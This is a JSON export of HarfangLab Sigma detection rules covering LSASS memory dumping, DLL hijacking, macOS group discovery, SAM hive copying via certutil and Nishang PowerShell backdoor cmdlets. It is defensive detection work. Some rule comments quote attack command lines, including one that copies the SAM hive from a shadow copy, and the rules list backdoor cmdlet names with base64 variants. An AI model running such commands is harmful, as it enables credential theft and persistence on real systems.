"content": "title: Process Memory Dumped via dotnet-dump.exe\nid: c7773add-97e5-4efe-a11f-e99ba3f36f11\ndescription: |\n Detects a suspicious attempt to dump a process' memory using dotnet-dump.exe, the legitimate .NET memory acquisition tool.\n This binary can be used as a LOLBin in order to dump the LSASS.exe process's memory.\n Adversaries may attempt to access credential material stored in the memory of the Local Security Authority Subsystem Service (LSASS) process.\n These credential materials can be harvested by an administrative user or SYSTEM and used to conduct Lateral Movement or Privilege Escalation.\n It is recommended to check the sensitivity of the data handled by the dumped process.\n For instance, LSASS.exe contains authentication secrets used by Windows during a session. As this data is highly sensitive, a dump of this process must be considered critical.\n It is also recommended to analyze the process responsible for the execution of dotnet-dump.exe to look for malicious content or actions.\nreferences:\n - https://twitter.com/bohops/status/1635288066909966338\n - https://learn.microsoft.com/fr-fr/dotnet/core/diagnostics/dotnet-dump\n - https://attack.mitre.org/techniques/T1003/001/\ndate: 2023/09/04\nmodified: 2025/01/30\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.001\n - attack.t1078\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.DotNetDump\n - classification.Windows.Behavior.LSASSAccess\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName: 'dotnet-dump.dll'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c7773add-97e5-4efe-a11f-e99ba3f36f11",
"rule_name": "Process Memory Dumped via dotnet-dump.exe",
"rule_description": "Detects a suspicious attempt to dump a process' memory using dotnet-dump.exe, the legitimate .NET memory acquisition tool.\nThis binary can be used as a LOLBin in order to dump the LSASS.exe process's memory.\nAdversaries may attempt to access credential material stored in the memory of the Local Security Authority Subsystem Service (LSASS) process.\nThese credential materials can be harvested by an administrative user or SYSTEM and used to conduct Lateral Movement or Privilege Escalation.\nIt is recommended to check the sensitivity of the data handled by the dumped process.\nFor instance, LSASS.exe contains authentication secrets used by Windows during a session. As this data is highly sensitive, a dump of this process must be considered critical.\nIt is also recommended to analyze the process responsible for the execution of dotnet-dump.exe to look for malicious content or actions.\n",
"rule_creation_date": "2023-09-04",
"rule_modified_date": "2025-01-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003.001",
"attack.t1078"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c7db9e9c-c52d-4c5a-890e-f53bebd19c29",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.088703Z",
"creation_date": "2026-03-23T11:45:34.088704Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.088709Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_magnify.yml",
"content": "title: DLL Hijacking via magnify.exe\nid: c7db9e9c-c52d-4c5a-890e-f53bebd19c29\ndescription: |\n Detects potential Windows DLL Hijacking via magnify.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers have used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'magnify.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\d3d9.dll'\n - '\\MAGNIFICATION.dll'\n - '\\OLEACC.dll'\n - '\\UIAutomationCore.DLL'\n - '\\WTSAPI32.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c7db9e9c-c52d-4c5a-890e-f53bebd19c29",
"rule_name": "DLL Hijacking via magnify.exe",
"rule_description": "Detects potential Windows DLL Hijacking via magnify.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers have used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c80c4c5b-0721-41af-9658-26d11add3470",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.628483Z",
"creation_date": "2026-03-23T11:45:34.628485Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.628489Z",
"rule_level": "low",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1069/001/",
"https://attack.mitre.org/techniques/T1033/"
],
"name": "t1069_001_dscl_groups_macos.yml",
"content": "title: Groups Discovered via Dscl\nid: c80c4c5b-0721-41af-9658-26d11add3470\ndescription: |\n Detects the execution of the dscl command to list all groups.\n Attackers may use it during the discovery phase of an attack to get the list of groups to which a user belongs.\n It is recommended to check for malicious behavior by the process launching dscl and correlate this alert with any other discovery activity.\nreferences:\n - https://attack.mitre.org/techniques/T1069/001/\n - https://attack.mitre.org/techniques/T1033/\ndate: 2022/12/01\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1069.001\n - attack.t1033\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.LOLBin.Dscl\n - classification.macOS.Behavior.Discovery\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection_base:\n # dscl . -list groups\n # dscl . -list /Groups\n # dscl . -list /Groups/../Groups\n # dscl . search /Groups \"Password\" \"*\"\n Image: '/usr/bin/dscl'\n ParentImage|contains: '?'\n CommandLine|contains:\n - 'list '\n - 'search '\n\n selection_groups:\n CommandLine|contains: 'groups'\n\n exclusion_jamf:\n ParentImage: '/usr/local/jamf/bin/jamf'\n\n exclusion_munki:\n - Ancestors|contains: '/Library/MunkiReport/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python'\n - ParentCommandLine|contains: '/usr/local/munkireport/scripts/'\n\n exclusion_mosyle:\n Ancestors|contains: '|/Library/Application Support/Mosyle/MosyleMDM.app/Contents/MacOS/MosyleMDM|'\n\n exclusion_mac_helper:\n ParentImage: '/Library/PrivilegedHelperTools/com.nordvpn.macos.helper'\n\n exclusion_pkinstallsandbox:\n GrandparentCommandLine: '/bin/sh -x /tmp/PKInstallSandbox.??????/Scripts/com.paloaltonetworks.pkg.cortex.??????/postinstall /usr/local/etc/FileWaveInstallers/FlatPackage-Cortex XDR.pkg/Cortex XDR.pkg / / /'\n\n exclusion_package_script_service:\n GrandparentImage: '/System/Library/PrivateFrameworks/PackageKit.framework/Versions/A/XPCServices/package_script_service.xpc/Contents/MacOS/package_script_service'\n\n exclusion_wapt:\n ParentImage: '/opt/wapt/wapt-get.bin'\n\n condition: selection_base and selection_groups and not 1 of exclusion_*\nlevel: low\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c80c4c5b-0721-41af-9658-26d11add3470",
"rule_name": "Groups Discovered via Dscl",
"rule_description": "Detects the execution of the dscl command to list all groups.\nAttackers may use it during the discovery phase of an attack to get the list of groups to which a user belongs.\nIt is recommended to check for malicious behavior by the process launching dscl and correlate this alert with any other discovery activity.\n",
"rule_creation_date": "2022-12-01",
"rule_modified_date": "2026-02-11",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1033",
"attack.t1069.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c82a4b4b-151b-46f2-9434-1433fd02d1e7",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.588398Z",
"creation_date": "2026-03-23T11:45:34.588401Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.588409Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://research.checkpoint.com/2023/rorschach-a-new-sophisticated-and-fast-ransomware/",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_cy.yml",
"content": "title: DLL Hijacking via cydump.exe\nid: c82a4b4b-151b-46f2-9434-1433fd02d1e7\ndescription: |\n Detects potential Windows DLL Hijacking via cydump.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers have used this technique by copying a legitimate signed executable to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://research.checkpoint.com/2023/rorschach-a-new-sophisticated-and-fast-ransomware/\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2023/09/01\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'cydump.exe'\n ProcessSignature|contains: 'Palo Alto Networks'\n # https://www.herdprotect.com/winutils.dll-458cf7d1960de61713a37a78ea89a12d1c119088.aspx\n ImageLoaded|endswith: '\\winutils.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files\\Palo Alto Networks\\'\n - '?:\\Program Files (x86)\\Palo Alto Networks\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files\\Palo Alto Networks\\'\n - '?:\\Program Files (x86)\\Palo Alto Networks\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature|contains: 'Palo Alto Networks'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c82a4b4b-151b-46f2-9434-1433fd02d1e7",
"rule_name": "DLL Hijacking via cydump.exe",
"rule_description": "Detects potential Windows DLL Hijacking via cydump.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers have used this technique by copying a legitimate signed executable to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2023-09-01",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c90ae8a5-2c24-4391-8726-bca61e75fc08",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.076081Z",
"creation_date": "2026-03-23T11:45:34.076083Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.076088Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.pwc.co.uk/issues/cyber-security-services/research/chasing-shadows.html",
"https://www.hexacorn.com/blog/2016/03/10/beyond-good-ol-run-key-part-36/",
"https://www.secureworks.com/research/shadowpad-malware-analysis",
"https://www.contextis.com/en/blog/dll-search-order-hijacking",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_oleview.yml",
"content": "title: DLL Hijacking via OLEVIEW.exe\nid: c90ae8a5-2c24-4391-8726-bca61e75fc08\ndescription: |\n Detects potential Windows DLL Hijacking via OLEVIEW.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.pwc.co.uk/issues/cyber-security-services/research/chasing-shadows.html\n - https://www.hexacorn.com/blog/2016/03/10/beyond-good-ol-run-key-part-36/\n - https://www.secureworks.com/research/shadowpad-malware-analysis\n - https://www.contextis.com/en/blog/dll-search-order-hijacking\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'OLEVIEW.EXE'\n ProcessSignature: 'Microsoft Corporation'\n ImageLoaded|endswith:\n - '\\aclui.dll'\n - '\\iviewers.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\Windows Kits\\10\\bin\\\\*\\arm64\\'\n - '?:\\Program Files (x86)\\Windows Kits\\10\\bin\\\\*\\x64\\'\n - '?:\\Program Files (x86)\\Windows Kits\\10\\bin\\\\*\\x86\\'\n - '?:\\Program Files\\Windows Kits\\10\\bin\\\\*\\arm64\\'\n - '?:\\Program Files\\Windows Kits\\10\\bin\\\\*\\x64\\'\n - '?:\\Program Files\\Windows Kits\\10\\bin\\\\*\\x86\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files (x86)\\Windows Kits\\10\\bin\\\\*\\arm64\\'\n - '?:\\Program Files (x86)\\Windows Kits\\10\\bin\\\\*\\x64\\'\n - '?:\\Program Files (x86)\\Windows Kits\\10\\bin\\\\*\\x86\\'\n - '?:\\Program Files\\Windows Kits\\10\\bin\\\\*\\arm64\\'\n - '?:\\Program Files\\Windows Kits\\10\\bin\\\\*\\x64\\'\n - '?:\\Program Files\\Windows Kits\\10\\bin\\\\*\\x86\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c90ae8a5-2c24-4391-8726-bca61e75fc08",
"rule_name": "DLL Hijacking via OLEVIEW.exe",
"rule_description": "Detects potential Windows DLL Hijacking via OLEVIEW.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c92bee55-bc7b-4337-9e4c-085336a03e25",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.086612Z",
"creation_date": "2026-03-23T11:45:34.086614Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.086618Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/deepinstinct/LsassSilentProcessExit",
"https://attack.mitre.org/techniques/T1055/"
],
"name": "t1003_001_lsass_silent_process_exit_remote_thread.yml",
"content": "title: Suspicious SilentProcessExit Remote Thread Started on LSASS\nid: c92bee55-bc7b-4337-9e4c-085336a03e25\ndescription: |\n Detects the creation of a remote thread executing the RtlReportSilentProcessExit function on LSASS.\n Attackers can use the SilentProcessExit registry key to trigger the creation of a process dump through WerFault.\n This technique can be used to silently dump LSASS' memory for credential access and privilege escalation.\n It is recommended to analyze the process responsible for accessing LSASS to look for malicious content or actions and to start memory forensics to determine compromised credentials.\nreferences:\n - https://github.com/deepinstinct/LsassSilentProcessExit\n - https://attack.mitre.org/techniques/T1055/\ndate: 2023/02/06\nmodified: 2025/02/03\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1055\n - attack.credential_access\n - attack.t1003.001\n - attack.persistence\n - attack.t1546.012\n - classification.Windows.Source.Thread\n - classification.Windows.Behavior.LSASSAccess\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: remote_thread\ndetection:\n selection:\n TargetImage|endswith: '\\lsass.exe'\n StartFunction|contains: 'RtlReportSilentProcessExit'\n\n exclusion_werfault:\n ProcessImage:\n - '?:\\Windows\\System32\\WerFault.exe'\n - '?:\\Windows\\syswow64\\WerFault.exe'\n ProcessParentCommandLine: '?:\\Windows\\System32\\svchost.exe -k WerSvcGroup'\n\n condition: selection and not 1 of exclusion_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c92bee55-bc7b-4337-9e4c-085336a03e25",
"rule_name": "Suspicious SilentProcessExit Remote Thread Started on LSASS",
"rule_description": "Detects the creation of a remote thread executing the RtlReportSilentProcessExit function on LSASS.\nAttackers can use the SilentProcessExit registry key to trigger the creation of a process dump through WerFault.\nThis technique can be used to silently dump LSASS' memory for credential access and privilege escalation.\nIt is recommended to analyze the process responsible for accessing LSASS to look for malicious content or actions and to start memory forensics to determine compromised credentials.\n",
"rule_creation_date": "2023-02-06",
"rule_modified_date": "2025-02-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1003.001",
"attack.t1055",
"attack.t1546.012"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c93e3348-ae77-418f-abad-6f51f9171f97",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.078007Z",
"creation_date": "2026-03-23T11:45:34.078009Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.078014Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1003/002/",
"https://attack.mitre.org/techniques/T1006/"
],
"name": "t1003_002_certutil_sam_vss.yml",
"content": "title: SAM Dumped from a Volume Shadow Copy via Certutil\nid: c93e3348-ae77-418f-abad-6f51f9171f97\ndescription: |\n Detects the usage of certutil to access SAM (Security Account Manager) registry hive via a Volume Shadow Copy.\n By abusing certutil to copy the SAM database, an attacker could gain access to local accounts hashes.\n It is recommended to take immediate action to isolate the machine and identify if the copied file has been exfiltrated.\nreferences:\n - https://attack.mitre.org/techniques/T1003/002/\n - https://attack.mitre.org/techniques/T1006/\ndate: 2021/12/13\nmodified: 2025/01/30\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.002\n - attack.defense_evasion\n - attack.t1006\n - attack.s0160\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Certutil\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.VolumeShadowCopy\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\certutil.exe'\n # Renamed binaries\n - OriginalFileName: 'CertUtil.exe'\n selection_commandline:\n # certutil.exe -f -v -encodehex \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\System32\\config\\SAM C:\\Windows\\TEMP\\dump\n CommandLine|contains|all:\n - '\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy'\n - 'Windows\\System32\\config\\SAM'\n condition: all of selection_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c93e3348-ae77-418f-abad-6f51f9171f97",
"rule_name": "SAM Dumped from a Volume Shadow Copy via Certutil",
"rule_description": "Detects the usage of certutil to access SAM (Security Account Manager) registry hive via a Volume Shadow Copy.\nBy abusing certutil to copy the SAM database, an attacker could gain access to local accounts hashes.\nIt is recommended to take immediate action to isolate the machine and identify if the copied file has been exfiltrated.\n",
"rule_creation_date": "2021-12-13",
"rule_modified_date": "2025-01-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1003.002",
"attack.t1006"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c9719cbf-a239-494a-8715-09a29b52eac6",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.092636Z",
"creation_date": "2026-03-23T11:45:34.092638Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.092642Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/samratashok/nishang",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1059_001_powershell_malicious_cmdlet_nishang_cmd.yml",
"content": "title: Malicious PowerShell Nishang Commandlets in Command-line\nid: c9719cbf-a239-494a-8715-09a29b52eac6\ndescription: |\n Detects various malicious commandlets in PowerShell's command-line, generally associated with the Nishang framework.\n Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming.\n It is recommended to investigate actions performed by attackers using the Nishang framework and to isolate infected systems.\nreferences:\n - https://github.com/samratashok/nishang\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2021/06/22\nmodified: 2025/02/20\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.defense_evasion\n - attack.t1059.001\n - attack.command_and_control\n - attack.t1095\n - attack.collection\n - attack.t1115\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Script.PowerShell\n - classification.Windows.Framework.Nishang\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_powershell:\n - Image|endswith: '\\powershell.exe'\n - OriginalFileName: 'PowerShell.EXE'\n\n selection_cmdlet:\n CommandLine|contains:\n # Add-RegBackdoor, from Nishang\n - 'Add-RegBackdoor'\n - 'QQBkAGQALQBSAGUAZwBCAGEAYwBrAGQAbwBvAHIA'\n - 'EAZABkAC0AUgBlAGcAQgBhAGMAawBkAG8AbwByA'\n - 'BAGQAZAAtAFIAZQBnAEIAYQBjAGsAZABvAG8Acg'\n # Add-ScrnSaveBackdoor, from Nishang\n - 'Add-ScrnSaveBackdoor'\n - 'QQBkAGQALQBTAGMAcgBuAFMAYQB2AGUAQgBhAGMAawBkAG8AbwByA'\n - 'EAZABkAC0AUwBjAHIAbgBTAGEAdgBlAEIAYQBjAGsAZABvAG8Acg'\n - 'BAGQAZAAtAFMAYwByAG4AUwBhAHYAZQBCAGEAYwBrAGQAbwBvAHIA'\n # Gupt-Backdoor, from Nishang\n - 'Gupt-Backdoor'\n - 'RwB1AHAAdAAtAEIAYQBjAGsAZABvAG8Acg'\n - 